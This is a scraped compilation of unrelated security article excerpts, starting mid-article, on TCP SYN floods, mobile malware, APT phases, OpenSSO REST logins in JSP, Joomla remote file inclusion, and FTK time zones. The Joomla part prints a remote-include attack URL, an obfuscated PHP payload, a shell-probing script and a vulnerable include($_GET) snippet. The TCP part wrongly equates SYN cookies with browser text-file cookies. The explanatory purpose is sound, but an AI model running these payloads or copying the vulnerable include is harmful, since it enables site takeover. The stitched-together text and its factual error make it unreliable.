Protocol / Service: Transmission Control Protocol (TCP)
Layer(s): TCP works in the transport layer of the TCP/IP model
Applications: Applications where delivery needs to be assured, such as email, the World Wide Web (WWW), file transfer, and so on, use TCP for transmission
Threats: Service disruption
Vulnerabilities: Half-open connections
Attacks: Denial-of-service attacks such as TCP SYN attacks; connection hijacking such as IP spoofing attacks
Countermeasures: SYN cookies; cryptographic solutions

A half-open connection is a vulnerability in the TCP implementation.
TCP uses a three-way handshake to establish or terminate connections. Refer to the following illustration: In a three-way handshake, first the client (workstation) sends a request to the server (www.some_website.com). This is known as a SYN request. The server acknowledges the request by sending SYN-ACK and, in the process, creates a buffer for that connection. The client does a final acknowledgement by sending ACK. TCP requires this setup because the protocol needs to ensure the reliability of packet delivery.

If the client does not send the final ACK, the connection is known as half-open. Since the server has created a buffer for that connection, a certain amount of memory or server resources is consumed. If thousands of such half-open connections are created maliciously, the server's resources may be completely consumed, resulting in a denial-of-service to legitimate requests. TCP SYN attacks work by establishing thousands of half-open connections to consume the server resources. Two actions can be taken by an attacker:

The attacker, or malicious software, will send thousands of SYNs to the server and withhold the ACKs. This is known as SYN flooding. Depending on the capacity of the network bandwidth and the server resources, over a span of time the entire set of resources will be consumed, resulting in a denial-of-service.

If the source IP were blocked by some means, then the attacker, or the malicious software, would try to spoof the source IP addresses to continue the attack. This is known as SYN spoofing.

SYN attacks, such as SYN flooding and SYN spoofing, can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. Instead, the server creates a cookie with the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on an algorithm, and sends it as the SYN-ACK.
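The SYN-cookie idea can be sketched as follows. This is a simplified illustration, assuming an HMAC-SHA-256 over the connection 4-tuple with a server-side secret; a real TCP stack encodes the cookie into the initial sequence number together with timestamp and MSS bits.

```python
import hashlib
import hmac

# Illustrative only: the secret below is a placeholder and would be
# rotated periodically in a real deployment.
SERVER_SECRET = b"rotate-me-periodically"

def syn_cookie(src_ip: str, src_port: int, dst_ip: str, dst_port: int) -> str:
    """Derive a stateless cookie from the connection 4-tuple."""
    material = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}".encode()
    return hmac.new(SERVER_SECRET, material, hashlib.sha256).hexdigest()[:16]

def verify_cookie(cookie: str, src_ip: str, src_port: int,
                  dst_ip: str, dst_port: int) -> bool:
    """On the final ACK, recompute and compare; only then allocate state."""
    expected = syn_cookie(src_ip, src_port, dst_ip, dst_port)
    return hmac.compare_digest(cookie, expected)
```

Because the cookie is recomputable from the packet itself, the server allocates no per-connection buffer until a valid ACK arrives, which is what defeats SYN flooding.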
When the server receives an ACK, it checks the details and creates the connection. A cookie is a piece of information, usually in the form of a text file, sent by the server to a client. Cookies are generally stored on a client's computer and are used for purposes such as authentication, session tracking, and management.

User Datagram Protocol (UDP)

UDP is a connectionless protocol similar to TCP. However, UDP does not guarantee the delivery of data packets.
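The connectionless nature of UDP is easy to see in code: no handshake takes place, a datagram is simply sent, and delivery is never acknowledged. A minimal loopback sketch:

```python
import socket

def udp_echo_once(payload: bytes) -> bytes:
    """Send one datagram over loopback; no handshake, no acknowledgement."""
    receiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    receiver.bind(("127.0.0.1", 0))      # the OS picks a free port
    addr = receiver.getsockname()

    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sender.sendto(payload, addr)         # fire and forget: no SYN/SYN-ACK/ACK

    data, _ = receiver.recvfrom(1024)    # arrived here, but was never guaranteed
    sender.close()
    receiver.close()
    return data
```

On the loopback interface the datagram almost always arrives, but nothing in the protocol confirms it; an application needing reliability over UDP must build its own acknowledgement scheme.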
Packt
17 Sep 2013
8 min read

Mobile and Social - the Threats You Should Know About

(For more resources related to this topic, see here.)

A prediction of the future (and the lottery numbers for next week) scams

Security threats, such as malware, are starting to manifest on mobile devices, as we are learning that mobile devices are not immune to viruses, malware, and other attacks. As PCs are increasingly being replaced by mobile devices, the incidence of new attacks against mobile devices is growing. The user has to take precautions to protect their mobile devices just as they would protect their PC.

One major type of mobile cybercrime is the unsolicited text message that captures personal details. Another type of cybercrime involves an infected phone that sends out an SMS message that results in excess connectivity charges. Mobile threats are on the rise according to the Symantec Report of 2012; 31 percent of all mobile users have received an SMS from someone that they didn't know. An example is where the user receives an SMS message that includes a link or phone number. This technique is used to install malware onto your mobile device. These techniques are also an attempt to hoax you into disclosing personal or private data. In 2012, Symantec released a new cybercrime report. They concluded that countries like Russia, China, and South Africa have the highest cybercrime incidence, with exploitation rates ranging from 80 to 92 percent. You can find this report at http://now-static.norton.com/now/en/pu/images/Promotions/2012/cybercrimeReport/2012_Norton_Cybercrime_Report_Master_FINAL_050912.pdf.

Malware

The most common type of threat is known as malware. It is short for malicious software. Malware is used or created by attackers to disrupt many types of computer operations, collect sensitive information, or gain access to a private mobile device/computer. It includes worms, Trojan horses, computer viruses, spyware, keyloggers, rootkits, and other malicious programs. As mobile malware is increasing at a rapid pace, the U.S.
government wants users to be aware of all the dangers. So in October 2012, the FBI issued a warning about mobile malware (http://www.fbi.gov/sandiego/press-releases/2012/smartphone-users-should-be-aware-of-malware-targeting-mobile-devices-and-the-safety-measures-to-help-avoid-compromise). The IC3 has been made aware of various malware attacking Android operating systems for mobile devices. Some of the latest known versions of this type of malware are Loozfon and FinFisher.

Loozfon hooks its victims by emailing the user promising links, such as a profitable payday just for sending out email. It then plants itself onto the phone when the user clicks on the link. This specific malware will attach itself to the device and start to collect information from your device, including:

- Contact information
- E-mail address
- Phone numbers
- Phone number of the compromised device

On the other hand, a spyware called FinFisher can take over various components of a smartphone. According to IC3, this malware infects the device through a text message and via a phony e-mail link. FinFisher attacks not only Android devices, but also devices running BlackBerry, iOS, and Windows.

Various security reports have shown that mobile malware is on the rise. Cyber criminals tend to target Android mobile devices. As a result, Android users are getting an increasing amount of destructive Trojans, mobile botnets, SMS-sending malware, and spyware. Some of these reports include:

- http://www.symantec.com/security_response/publications/threatreport.jsp
- http://pewinternet.org/Commentary/2012/February/Pew-Internet-Mobile.aspx
- https://www.lookout.com/resources/reports/mobile-threat-report

As stated recently in a Pew survey, more than fifty percent of U.S. mobile users are overly suspicious/concerned about their personal information, and have either refused to install apps for this reason or have uninstalled apps.
In other words, the IC3 says: Use the same precautions on your mobile devices as you would on your computer when using the Internet.

Toll fraud

Since the 1970s and 1980s, hackers have been using a process known as phreaking. This trick provides a tone that tells the phone that a control mechanism is being used to manage long-distance calls. Today, hackers are using a technique known as toll fraud: malware that sends premium-rate SMSs from your device, incurring charges on your phone bill. Some toll fraud malware may trick you into agreeing to murky Terms of Service, while others can send premium text messages without any noticeable indicators. This is also known as premium-rate SMS malware or premium service abuser. The following figure shows how toll fraud works, as portrayed by Lookout Mobile Security.

According to VentureBeat, malware developers are after money, and the money is in toll fraud malware. Here is an example from http://venturebeat.com/2012/09/06/toll-fraud-lookout-mobile/:

Remember commercials that say, "Text 666666 to get a new ringtone everyday!"? The normal process includes:

1. The customer texts the number, alerting a collector - working for the ringtone provider - that he/she wants to order daily ringtones.
2. Through the collector, the ringtone provider sends a confirmation text message (or sometimes two, depending on that country's regulations) to the customer.
3. The customer approves the charges and starts getting ringtones.
4. The customer is billed through the wireless carrier.
5. The wireless carrier receives payment and sends the ringtone payment to the provider.

Now, let's look at the steps when your device is infected with the malware known as FakeInst: The end user downloads a malware application that sends out an SMS message to that same ringtone provider. As normal, the ringtone provider sends the confirmation message.
In this case, instead of reaching the smartphone owner, the malware blocks this message and sends a fake confirmation message before the user ever knows. The malware now places itself between the wireless carrier and the ringtone provider. Pretending to be the collector, the malware extracts the money that was paid through the user's bill. FakeInst is known to get around antivirus software by identifying itself as new or unique software.

Overall, Android devices are known to be impacted more by malware than iOS. One big reason for this is that Android devices can download applications from almost any location on the Internet, whereas Apple limits its users to downloading applications from the Apple App Store.

SMS spoofing

The third most common type of scam is called SMS spoofing. SMS spoofing allows a person to change the original mobile phone number or name (sender ID) that a text message comes from. It is a fairly new technology that uses SMS on mobile phones. Spoofing can be used in both lawful and unlawful ways. Impersonating a company, another person, or a product is an illegal use of spoofing. Some nations have banned it due to concerns about the potential for fraud and abuse, while others may allow it.

An example of how SMS spoofing is implemented is as follows: SMS spoofing occurs when the message sender's address information has been manipulated. This is often done to impersonate a cell phone user who is roaming on a foreign network and sending messages to a home area network. Often, these messages are addressed to users who are outside the home network, which is essentially being "hijacked" to send messages to other networks. The impacts of this activity include the following:

- The customer's network can incur termination charges caused by the valid delivery of these "bad" messages to interlink partners.
- Customers may complain about being spammed, or their message content may be sensitive.
- Interlink partners can cancel the home network unless a correction of these errors is implemented; once this is done, the phone service may be unable to send messages to these networks.
- There is a great risk that these messages will look like real messages, and real users can be billed for invalid roaming messages that they did not send.

There is a flaw within iPhone that allows SMS spoofing. It is vulnerable to text message spoofing, even with the latest beta version, iOS 6. The problem with iPhone is that when the sender specifies a reply-to number this way, the recipient doesn't see the original phone number in the text message. That means there's no way to know whether a text message has been spoofed or not. This opens up the user to other spoofing types of manipulation where the recipient thinks he/she is receiving a message from a trusted source. According to pod2g (http://www.pod2g.org/2012/08/never-trust-sms-ios-text-spoofing.html): In a good implementation of this feature, the receiver would see the original phone number and the reply-to one. On iPhone, when you see the message, it seems to come from the reply-to number, and you loose track of the origin.
Packt
23 Dec 2013
6 min read

Social Engineering Attacks

(For more resources related to this topic, see here.)

Advanced Persistent Threats

Advanced Persistent Threats (APTs) came into existence during cyber espionage between nations. The main motives for these attacks are monetary gain and lucrative information. APTs normally target a specific organization, and a targeted attack is the prerequisite for an APT. The targeted attack commonly exploits a vulnerability in an application on the target. The attacker normally crafts a mail with a malicious attachment, such as a PDF document or an executable, which is e-mailed to an individual or group of individuals. Generally, these e-mails are prepared with some social engineering element to make them lucrative to the target. The typical characteristics of APTs are as follows:

Reconnaissance: The attacker is motivated to get to know the target and their environment: specific users, system configurations, and so on. This type of information can be obtained from metadata collected from the targeted organization's documents, which can easily be gathered from the organization's website using tools such as FOCA, metagoofil, libextractor, and CeWL.

Time-to-live: In APTs, attackers utilize techniques to bypass security and deploy a backdoor to keep access open for a longer period of time, placing a backdoor so they can always come back in case their actual presence is detected.

Advanced malware: The attacker utilizes polymorphic malware in the APT. Polymorphic malware generally changes throughout its cycle to fool AV detection mechanisms.

Phishing: Most APTs exploiting the target machine's applications start with social engineering and spear phishing. Once the target machine is compromised or network credentials are given up, the attackers actively take steps to deploy their own tools to monitor and spread through the network as required, from machine to machine, and network to network, until they find the information they are looking for.
Active attack: In an APT, there is a human element involved; everything is not automatic malicious code.

Famous attacks classified under APTs are as follows:

- Operation Aurora
- McRAT
- Hydraq
- Stuxnet
- RSA SecurID attacks

The APT life cycle covers five phases, which are as follows:

- Phase 1: Reconnaissance
- Phase 2: Initial exploitation
- Phase 3: Establish presence and control
- Phase 4: Privilege escalation
- Phase 5: Data extraction

Phase 1: Reconnaissance

It is a well-known saying that a war is half won not only on our strength but also on how well we know our enemy. The attacker generally gathers information from a variety of sources as initial preparation, and the same definitely applies to the defender. Information is gathered on specific people (mostly higher management people who possess important information), on specific events, on setting up an initial attack point, and on application vulnerabilities. There are multiple places, such as Facebook, LinkedIn, Google, and many more, where the attacker tries to find this information. There are tools that assist with this, such as the Social Engineering Framework (SEF) that we have included in the book Kali Linux Social Engineering; another one that I suggest is the FOCA metadata collector. An attack is planned based on the information gathered, so an employee awareness program must be run continuously to make employees aware that they should not highlight themselves on the Internet, and to better prepare them to defend against these attacks.

Phase 2: Initial exploitation

A spear-phishing attack is considered one of the most advanced targeted attacks; such attacks are also called advanced persistent threat (APT) attacks. Today, many cyber criminals use spear-phishing attacks to initially exploit the machine. The objective of performing spear phishing is to gain long-term access to different resources of the target, for example government or military networks, or satellite usage.
The main motivation for performing such attacks is to gain access to the IT environment and utilize a zero-day exploit found in the initial information gathering phase. This attack is considered most dangerous because the attacker can spoof an e-mail ID when sending a malicious e-mail. A complete example of the implementation of this, in graphical format, has been included in the book Kali Linux Social Engineering.

Phase 3: Establishing presence and control

The main objective of this stage is to deploy a full range of attack tools, such as backdoors and rootkits, to start controlling the environment and stay undetected. The organization needs to watch outbound connections to deter such attacks, because the attack tools make outbound connections to the attacker.

Phase 4: Privilege escalation

This is one of the key phases in an APT. Once the attacker has breached the network, the next step is to take over privileged accounts to move around the targeted network. The common objective of the attacker is to obtain administrator-level credentials and stay undetected. The best approach to defend against these attacks is to assume that the attackers are inside our networks right now and proceed accordingly, blocking the pathways they're travelling to access and steal our sensitive data.

Phase 5: Data extraction

This is the stage where the attacker has control over one or two machines in the targeted network, has obtained access credentials to extend their reach, and has identified the lucrative data. The only objective left for the attacker is to start sending the data from the targeted network to one of their own servers or machines. The attacker has a number of options for what to do with this data: ask for a ransom and threaten to disclose the information in public if the target does not agree to pay, share the zero-day exploits, sell the information, or disclose it publicly.
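Looking back at the reconnaissance phase, the kind of contact harvesting that tools such as metagoofil or CeWL automate can be approximated, as a toy illustration for awareness purposes only, with a simple pattern scan over collected text; this sketch is hypothetical and is not a substitute for those tools:

```python
import re

# A deliberately simple address pattern; real harvesters handle many more
# encodings and obfuscations ("alice at example dot com", and so on).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def harvest_emails(text: str) -> list:
    """Return unique e-mail addresses found in scraped text, in order."""
    seen = []
    for match in EMAIL_RE.findall(text):
        if match not in seen:
            seen.append(match)
    return seen
```

Running such a scan over an organization's own public documents is a cheap way to see what an APT attacker would find in their first reconnaissance pass.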
APT defense

Defense against APT attacks is based mostly on their characteristics. APT attacks normally bypass network firewall defenses by attaching exploits within content carried over allowed protocols, so deep content filtering is required. Most APT attacks use custom-developed code or target zero-day vulnerabilities, so no single IPS or antivirus signature will be able to identify the threat; we must rely on less definitive indicators. The organization must ask itself what it is trying to protect, and perhaps it can apply a layer of data loss prevention (DLP) technology. The organization needs to monitor both inbound and outbound network traffic, preferably for both web and e-mail communication.

Summary

In this article, we learned what APTs are and the types of APTs.

Resources for Article:

Further resources on this subject: Web app penetration testing in Kali [Article] Debugging Sikuli scripts [Article] Customizing a Linux kernel [Article]
Packt
12 May 2010
8 min read

Securing our Applications using OpenSSO in GlassFish Security

An example of such a system is the integration between an online shopping system, the product provider who actually produces the goods, the insurance company that provides insurance on purchases, and finally the shipping company that delivers the goods to the consumers' hands. All of these systems access some part of the data, which flows into the other software so each can perform its job in an efficient way. All the employees can benefit from a single sign-on solution, which keeps them free from having to authenticate themselves multiple times during the working day. Another example can be a travel portal, whose clients need to communicate with many other systems to plan their traveling.

Integration between an in-house system and external partners can happen at different levels, from communication protocol and data format to security policies, authentication, and authorization. Because of the variety of communication models, policies, and client types that each partner may use, unifying the security model is almost impossible, and the need for some kind of integration mechanism shows itself more and more boldly. SSO as a concept and OpenSSO as a product address this need for integrating systems' security together.

OpenSSO provides developers with several client interfaces to interact with OpenSSO to perform authentication, authorization, session and identity management, and auditing. These interfaces include the Client SDK for different programming languages, and standards including:

- Liberty Alliance Project and Security Assertion Markup Language (SAML) for authentication and single sign-on (SSO)
- eXtensible Access Control Markup Language (XACML) for authorization functions
- Service Provisioning Markup Language (SPML) for identity management functions

Using the client SDKs and standards mentioned above is suitable when we are developing custom solutions or integrating our system with partners which are already using them in their security infrastructure.
For any other scenario these methods are overkill for developers. To make it easier for developers to interact with OpenSSO core services, the Identity Web Services (IWS) are provided. We discussed IWS briefly in the OpenSSO functionalities section. The IWS are included in OpenSSO to perform the tasks in the following table.

Authentication and single sign-on: Verifying the user credentials or its authentication token.
Authorization: Checking the authenticated user's permissions for accessing a resource.
Provisioning: Creating, deleting, searching, and editing users.
Logging: Ability to audit and record operations.

IWS are exposed in two models: the first model is the WS-* compliant SOAP-based Web Services, and the second model is a very simple but elegant RESTful set of services based on HTTP and REST principles. Finally, the third way of using OpenSSO is deploying the policy agents to protect the resources available in a container. In the following section we will use the RESTful interface to perform authentication, authorization, and SSO.

Authenticating users by the RESTful interface

Performing authentication using the RESTful Web Services interface is very simple, as it is just like performing pure HTTP communication with an HTTP server. For each type of operation there is one URL, which may have some required parameters, and the output is what we can expect from that operation. The URL for the authentication operation, along with its parameters, is as follows:

Operation: Authentication
Operation URL: http://host:port/OpenSSOContext/identity/authenticate
Parameters: username, password, uri
Output: subjectid

The Operation URL specifies the address of a Servlet which will receive the required parameters, perform the operation, and write back the result. In the template included above we have the host, port, and OpenSSOContext, which are things we already know.
The path includes the task type, which can be one of the tasks included in the IWS task list table, and the operation we want to invoke. All parameters are self-descriptive except uri. We pass a URL to have our users redirected to it after the authentication is performed. This URL can include information related to the user or the original resource which the user has requested. In the case of successful authentication we will receive a subjectid, which we can use in any other RESTful operation, such as authorization, logging in, logging out, and so on. If you remember session IDs from your web development experience, subjectid is the same as a session ID. You can view all sessions, along with related information, from the OpenSSO administration console homepage under the Sessions tab. The following listing shows a sample JSP page which performs a RESTful call over OpenSSO to authenticate a user and obtain a session ID for the user if they get authenticated.

<%
try {
    String operationURL =
        "http://gfbook.pcname.com:8080/opensso/identity/authenticate";
    String username = "james";
    String password = "james";
    username = java.net.URLEncoder.encode(username, "UTF-8");
    password = java.net.URLEncoder.encode(password, "UTF-8");
    String operationString = operationURL + "?username=" + username +
        "&password=" + password;
    java.net.URL Operation = new java.net.URL(operationString);
    java.net.HttpURLConnection connection =
        (java.net.HttpURLConnection) Operation.openConnection();
    int responseCode = connection.getResponseCode();
    if (responseCode == java.net.HttpURLConnection.HTTP_OK) {
        java.io.BufferedReader reader = new java.io.BufferedReader(
            new java.io.InputStreamReader(
                (java.io.InputStream) connection.getContent()));
        out.println("<h2>Subject ID</h2>");
        String line = reader.readLine();
        out.println(line);
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>

REST made straightforward tasks easier than ever.
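For comparison, the URL assembly performed by the JSP listing above can be sketched in Python as well. The endpoint path and parameter names come from the operation template in this section; the host and credentials in the usage note are the sample values used throughout, and no network call is made here:

```python
from urllib.parse import urlencode

def build_authenticate_url(base: str, username: str, password: str) -> str:
    """Assemble the OpenSSO RESTful authenticate URL, URL-encoding parameters."""
    endpoint = base.rstrip("/") + "/identity/authenticate"
    return endpoint + "?" + urlencode({"username": username, "password": password})
```

Calling build_authenticate_url("http://gfbook.pcname.com:8080/opensso", "james", "james") yields the same URL the JSP listing assembles; an HTTP GET on it would then return the subjectid on success.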
Without REST we would have had to deal with the complexity of SOAP, WSDL, and so on, but with REST you can understand the whole code on a first scan. Beginning from the top, we define the REST operation URL, which is assembled by taking the operation URL and appending the required parameters as name=value pairs. The URL that we connect to will be something like:

http://gfbook.pcname.com:8080/opensso/identity/authenticate?username=james&password=james

After assembling the URL we open a network connection and perform the authentication. After opening the connection we can check whether we received an HTTP_OK response from the server. Receiving HTTP_OK means that the authentication was successful and we can read the subjectid from the socket. The connection may result in other response codes, such as HTTP_UNAUTHORIZED (HTTP error code 401) when the credentials are not valid. A complete list of possible return values can be found at http://java.sun.com/javase/6/docs/api/java/net/HttpURLConnection.html.

Authorizing using REST

If you remember, in the Configuring OpenSSO for authentication and authorization section we defined a rule that polices the http://gfbook.pcname.com:8080/ URL for us, and later on we applied the policy rule to a group of users that we created; now we want to check how our policy works. In every security system, before any authorization process, an authentication process must complete with a positive result. In our case the result of the authentication is the subjectid, which the authorization process uses to check whether the authenticated entity is allowed to perform the action or not.
The URL for the authorization operation, along with its parameters, is as follows:

Operation: Authorization
Operation URL: http://host:port/OpenSSOContext/identity/authorize
Parameters: uri, action, subjectid
Output: true or false, based on the permission of the subject over the entity and the given action

The combination of uri, action, and subjectid specifies that we want to check our client, identified by subjectid, for permission to perform the specified action on the resource identified by the uri. The output of the service invocation is either true or false. The following listing shows how we can check whether an authenticated user has access to a certain resource. In the sample code we are checking james, identified by the subjectid we acquired by executing the previous code snippet, against the localhost Protector rule we defined earlier.

```jsp
<%
try {
    String operationURL =
        "http://gfbook.pcname.com:8080/opensso/identity/authorize";
    String protectedUrl = "http://127.0.0.1:38080/Conversion-war/";
    String subjectId =
        "AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#";
    String action = "POST";
    protectedUrl = java.net.URLEncoder.encode(protectedUrl, "UTF-8");
    subjectId = java.net.URLEncoder.encode(subjectId, "UTF-8");
    String operationString = operationURL + "?uri=" + protectedUrl +
            "&action=" + action + "&subjectid=" + subjectId;
    java.net.URL Operation = new java.net.URL(operationString);
    java.net.HttpURLConnection connection =
            (java.net.HttpURLConnection) Operation.openConnection();
    int responseCode = connection.getResponseCode();
    if (responseCode == java.net.HttpURLConnection.HTTP_OK) {
        java.io.BufferedReader reader = new java.io.BufferedReader(
                new java.io.InputStreamReader(
                        (java.io.InputStream) connection.getContent()));
        out.println("<h2>Authorization Result</h2>");
        String line = reader.readLine();
        out.println(line);
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>
```

Everything in this listing is the same as in the authentication process in terms of initializing objects and calling methods, except that at the beginning we define the protected URL string, then we include the subjectid, which is the result of our previous authentication. Later on we define the action whose permission we need to check for our authenticated user, and finally we read the result of the authorization. The complete operation, after including all parameters, is similar to the following snippet:

http://gfbook.pcname.com:8080/opensso/identity/authorize?uri=http://127.0.0.1:38080/Conversion-war/&action=POST&subjectid=subjectId

Note that no two subjectid values are ever identical, even for the same user on the same machine and the same OpenSSO installation. So, before running this code, make sure that you perform the authentication process and substitute the subjectid resulting from your authentication for the subjectid shown above.
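Because every parameter travels on the query string, correct URL-encoding is what keeps characters such as ':', '/', and '=' inside the subjectid from corrupting the request. A minimal, self-contained sketch of the URL assembly performed by the JSP listings (the helper class and method names are ours for illustration, not part of the OpenSSO API):

```java
import java.net.URLEncoder;

public class AuthorizeUrlBuilder {

    // Assembles the RESTful authorization URL from the uri, action, and
    // subjectid parameters described above. Only the parameter values are
    // encoded; the base operation URL is left untouched.
    static String buildAuthorizeUrl(String operationURL, String protectedUrl,
                                    String action, String subjectId)
            throws Exception {
        return operationURL
                + "?uri=" + URLEncoder.encode(protectedUrl, "UTF-8")
                + "&action=" + URLEncoder.encode(action, "UTF-8")
                + "&subjectid=" + URLEncoder.encode(subjectId, "UTF-8");
    }

    public static void main(String[] args) throws Exception {
        System.out.println(buildAuthorizeUrl(
                "http://gfbook.pcname.com:8080/opensso/identity/authorize",
                "http://127.0.0.1:38080/Conversion-war/",
                "POST",
                "AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#"));
    }
}
```

The '=' and '@' characters in a real subjectid are exactly the kind of payload that breaks a naively concatenated query string, which is why the JSP listings call URLEncoder before assembling the request.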
Packt
15 Oct 2009
7 min read

Preventing Remote File Includes Attack on your Joomla Websites

PHP is an open-source server-side scripting language. It is the basis of many web applications and works very nicely with database-backed platforms such as Joomla!. Since Joomla! is growing and its popularity is increasing, malicious hackers are looking for holes. The development community has the prime responsibility to produce the most secure extensions possible. In my opinion, this comes before usability, accessibility, and so on. After all, if a beautiful extension has some glaring holes, it won't be useable. The administrators and site development folks have the next layer of responsibility: to ensure that they have done everything they can to prevent attacks by checking crucial settings, patching, and monitoring logs. If these two are combined and executed properly, they will result in secure web transactions. SQL injections, though very nasty, can be prevented in many cases; but an RFI attack is more difficult to stop altogether. So, it is important that you are aware of them and know their signs.

Remote File Includes

An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code. It is important to note that File Inclusion attacks such as these can mostly be mitigated by turning Register_Globals off. Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion. The following is a sanitized attempt to attack a server in just such a manner:

http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?
If the site in this example did not have appropriate safeguards in place, the following code would be executed:

```php
$x0b="inx72_147x65x74"; $x0c="184rx74o154x6fwex72";
echo "c162141156kx5fr157cx6bs";
if (@$x0b("222x61x33e_x6d144e") or
    $x0c(@$x0b("x73ax66x65_mx6fde")) == "x6fx6e") {
    echo "345a146x65155od145x3ao156";
} else {
    echo "345a146ex6dox64e:x6ffx66";
}
exit();
?>
```

This code is from a group that calls itself "Crank". The purpose of this code is not known, and therefore we do not want it to be executed on our site. This attempt to insert the code appears to want my browser to execute something and report one thing or another:

```php
{echo "345a146x65155od145x3ao156";}else{
echo "345a146ex6dox64e:x6ffx66";}exit();
```

Here is another example of an attempted script. This one is in PHP, and would attempt to execute in the same fashion by making an insertion on the URL:

```php
<html><head><title>/// Response CMD ///</title></head>
<body bgcolor=DC143C><H1>Changing this CMD will result
in corrupt scanning !</H1></html></head></body>
<?php
if((@eregi("uid",ex("id"))) ||
   (@eregi("Windows",ex("net start")))){
    echo("Safe Mode of this Server is : ");
    echo("SafemodeOFF");
} else {
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if((@eregi("uid",ex("id"))) ||
       (@eregi("Windows",ex("net start")))){
        echo("Safe Mode of this Server is : ");
        echo("SafemodeOFF");
    } else {
        echo("Safe Mode of this Server is : ");
        echo("SafemodeON");
    }
}
...
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
}}
return $res;
}
exit;
```

This sanitized example wants to learn whether we are running SAFE MODE on or off, and then would attempt to start a command shell on our server. If the attackers are successful, they will gain access to the machine and take over from there. For Windows users, a command shell is equivalent to running START | RUN | CMD, thus opening what we would call a "DOS prompt".
Other methods of attack include the following:

- Evil code uploaded through session files, or through image uploads.
- The insertion or placement of code in content you might think would be safe, such as compressed audio streams. These do not get inspected as they should be, and could allow access to remote resources. It is noteworthy that this can slip past even if you have set allow_url_fopen or allow_url_include to disabled.
- Taking input from the request POST data rather than from a data file.

There are several other methods beyond this list, and judging from the traffic at my sites, the list and methods change on an "irregular" basis. This highlights our need for a robust security architecture, and for being very careful in accepting user input on our websites.

The Most Basic Attempt

You don't always need heavy or fancy code as in the earlier examples. Just appending a page request of sorts to the end of our URL will do it. Remember this?

/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?

Here we're instructing the server to force the path in our environment to change to match the code located out there. Here is such a "shell":

```php
<?php
$file = $_GET['evil-page'];
include($file . ".php");
?>
```

What Can We Do to Stop This?

As stated repeatedly, defense in depth is the most important of design considerations. Putting up many layers of defense will enable you to withstand attacks. This type of attack can be defended against at the .htaccess level and by filtering the inputs. One problem is that we tend to forget that many defaults in PHP set up a condition for failure. Take this for instance: allow_url_fopen is on by default. "Default? Why do you care?" you may ask.
This, if enabled, allows the PHP file functions such as file_get_contents(), and the ever-present include and require statements, to work in a manner you may not have anticipated, such as retrieving the entire contents of your website, or allowing a determined attacker to break in. Programmers sometimes forget to do proper input filtering in their user fields, such as an input box that accepts any type of data, allowing code to be inserted for an injection attack. Lots of site break-ins, defacements, and worse are the result of a combination of poor programming on the coder's part and not disabling the allow_url_fopen option. This leads to code injections as in our previous examples. Make sure you keep Register Globals OFF. This is a biggie that will prevent much evil! There are a few ways to do this, and depending on your version of Joomla!, they are handled differently. In Joomla! versions earlier than 1.0.13, look for this code in globals.php:

```php
// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
/*
 * Use 1 to emulate register_globals = on
 * WARNING: SETTING TO 1 MAY BE REQUIRED FOR BACKWARD COMPATIBILITY
 * OF SOME THIRD-PARTY COMPONENTS BUT IS NOT RECOMMENDED
 *
 * Use 0 to emulate register_globals = off
 * NOTE: THIS IS THE RECOMMENDED SETTING FOR YOUR SITE BUT YOU MAY
 * EXPERIENCE PROBLEMS WITH SOME THIRD-PARTY COMPONENTS
 */
define( 'RG_EMULATION', 0 );
```

Make sure RG_EMULATION is set to zero (0) instead of one (1). When Joomla! is installed out of the box it is 1, meaning register_globals is set to on. In Joomla! 1.0.13 and greater (in the 1.x series), look for this field in the GLOBAL CONFIGURATION BUTTON | SERVER tab:

Have you upgraded from an earlier version of Joomla!? Affects: Joomla! 1.0.13–1.0.14
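Beyond the configuration settings above, the core of the fix is to never feed request input directly to an include. A minimal whitelist sketch, shown here in Java servlet terms to match the rest of this book (the page names and paths are hypothetical), applies the same principle a hardened PHP include would:

```java
import java.util.Set;

public class PageDispatcher {

    // Fixed whitelist of page names; hypothetical values for illustration.
    private static final Set<String> ALLOWED_PAGES =
            Set.of("home", "contact", "about");

    // Returns a safe internal resource for the requested page. Anything
    // outside the whitelist, including a remote URL such as
    // "http://evil.example/shell", falls through to the error page.
    static String resolve(String requestedPage) {
        if (requestedPage != null && ALLOWED_PAGES.contains(requestedPage)) {
            return "/pages/" + requestedPage + ".jsp";
        }
        return "/pages/error.jsp";
    }

    public static void main(String[] args) {
        System.out.println(resolve("home"));
        System.out.println(resolve("http://evil.example/shell?"));
    }
}
```

With a whitelist there is nothing to sanitize: the attacker's URL is never used as a path at all, so neither allow_url_fopen nor register_globals settings can turn it into an inclusion.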
Packt
18 Mar 2014
4 min read

Processing the Case

Changing the time zone

The correct use of the Time Zone feature is of the utmost importance in computer forensics, because an incorrect setting makes the evidence reflect the wrong MAC times of files, leading a professional to use the wrong information in an investigation report. Based on this, you must configure the time zone to reflect the location where the evidence was acquired. For example, if you conducted the acquisition of a computer that was located in Los Angeles, US, and bring the evidence to Sao Paulo, Brazil, where your lab is situated, you should adjust the time zone to Los Angeles so that the MAC times of files reflect the actual moments of their modification, access, and creation. FTK allows you to make that time zone change at the same time that you add new evidence to the case. Select the time zone of the location where the evidence was seized from the drop-down list in the Time Zone field. This is required to add evidence to the case. Take a look at the following screenshot:

You can also change the value of Time Zone after adding the evidence. In the menu toolbar, click on View and then click on Time Zone Display.

Mounting compound files

